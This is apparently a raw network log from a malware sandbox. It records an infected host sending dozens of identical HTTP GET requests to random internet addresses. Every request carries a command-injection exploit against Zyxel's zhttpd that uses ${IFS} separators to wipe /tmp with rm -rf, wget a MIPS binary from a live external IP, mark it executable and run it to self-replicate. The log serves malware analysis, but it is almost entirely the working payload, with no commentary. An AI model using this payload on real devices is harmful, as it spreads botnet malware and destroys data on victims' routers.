                              Mar 31, 2024 08:42:01.268631935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7942192.168.2.1337928118.110.252.79443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.268687963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7943192.168.2.1341958147.234.202.142443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.268745899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7944192.168.2.134872212.88.74.11443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.268785954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7945192.168.2.1347554106.193.144.126443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.268842936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7946192.168.2.1347716175.184.47.200443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.268908024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7947192.168.2.134699484.28.78.46443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.268950939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7948192.168.2.1352990142.57.89.234443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.269007921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7949192.168.2.1333574142.44.91.10443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.269056082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7950192.168.2.1343452173.43.68.70443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.269090891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7951192.168.2.1354412130.251.171.136443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.269145966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7952192.168.2.1336254184.200.11.29443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.269193888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7953192.168.2.134521277.213.18.173443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.269268036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7954192.168.2.1359106113.73.84.56443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.269316912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7955192.168.2.134122840.6.190.235443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.269345045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7956192.168.2.135618031.194.212.194443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.269402027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7957192.168.2.133555486.30.139.225443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.269440889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7958192.168.2.134276639.111.79.81443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.269512892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7959192.168.2.133405035.174.56.103443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.269553900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7960192.168.2.1356598114.211.144.161443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.269598007 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7961192.168.2.135637020.221.163.95443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.269646883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7962192.168.2.134240214.172.125.162443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.269701004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7963192.168.2.135509661.161.178.40443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.269752979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7964192.168.2.1354266156.223.233.202443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.269807100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7965192.168.2.1333800203.51.175.185443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.269864082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7966192.168.2.135093041.100.199.51443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.269902945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7967192.168.2.1348588107.67.235.72443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.269949913 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7968192.168.2.135446820.176.115.15443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.269979954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7969192.168.2.134719223.194.254.113443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.270050049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7970192.168.2.1334642213.140.95.116443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.270093918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7971192.168.2.135786439.142.41.117443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.270147085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7972192.168.2.1335884181.244.43.232443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.270222902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7973192.168.2.135132096.112.216.35443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.270248890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7974192.168.2.135783899.89.230.35443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.270293951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7975192.168.2.1349754168.145.223.21443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.270333052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7976192.168.2.1336788133.246.156.108443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.270361900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7977192.168.2.136093086.32.194.44443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.270426035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7978192.168.2.1346076147.198.181.175443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.270478010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7979192.168.2.1357346159.198.84.28443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.270539999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7980192.168.2.133602682.16.241.125443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.270628929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7981192.168.2.1339076187.131.68.231443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.270663977 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7982192.168.2.133713498.117.209.254443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.270689964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7983192.168.2.134530820.173.236.60443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.270750999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7984192.168.2.1341374175.147.147.104443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.270771027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7985192.168.2.1335314139.183.33.87443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.270817995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7986192.168.2.1340440160.254.198.90443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.270864010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7987192.168.2.134759235.192.232.239443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.270909071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7988192.168.2.1344988136.95.181.204443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.270957947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7989192.168.2.133479461.203.53.173443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.271027088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7990192.168.2.134438659.128.59.54443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.271070004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7991192.168.2.1344474182.199.88.158443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.271094084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7992192.168.2.135327223.230.143.130443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.271122932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7993192.168.2.1346038107.142.252.111443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.271171093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7994192.168.2.1340892195.78.198.62443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.271205902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7995192.168.2.133436672.108.2.169443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.271245003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7996192.168.2.1352614179.164.119.196443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.271282911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7997192.168.2.1359142136.248.53.109443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.271317959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7998192.168.2.1359592203.53.158.134443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.271338940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7999192.168.2.1345782138.208.152.238443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.271378994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8000192.168.2.1360708161.66.172.85443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.271434069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8001192.168.2.1350048186.116.32.188443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.271480083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8002192.168.2.135768651.198.72.217443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.271542072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8003192.168.2.1338392145.50.37.181443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.271574974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8004192.168.2.1336890142.145.200.115443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.271627903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8005192.168.2.134942234.226.247.170443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.271691084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8006192.168.2.135378249.71.213.59443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.271729946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8007192.168.2.1343756222.137.182.124443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.271792889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8008192.168.2.134654612.99.96.82443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.271816015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8009192.168.2.1358336157.142.209.223443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.271872044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8010192.168.2.135292631.139.110.235443
                              TimestampBytes transferredDirectionData
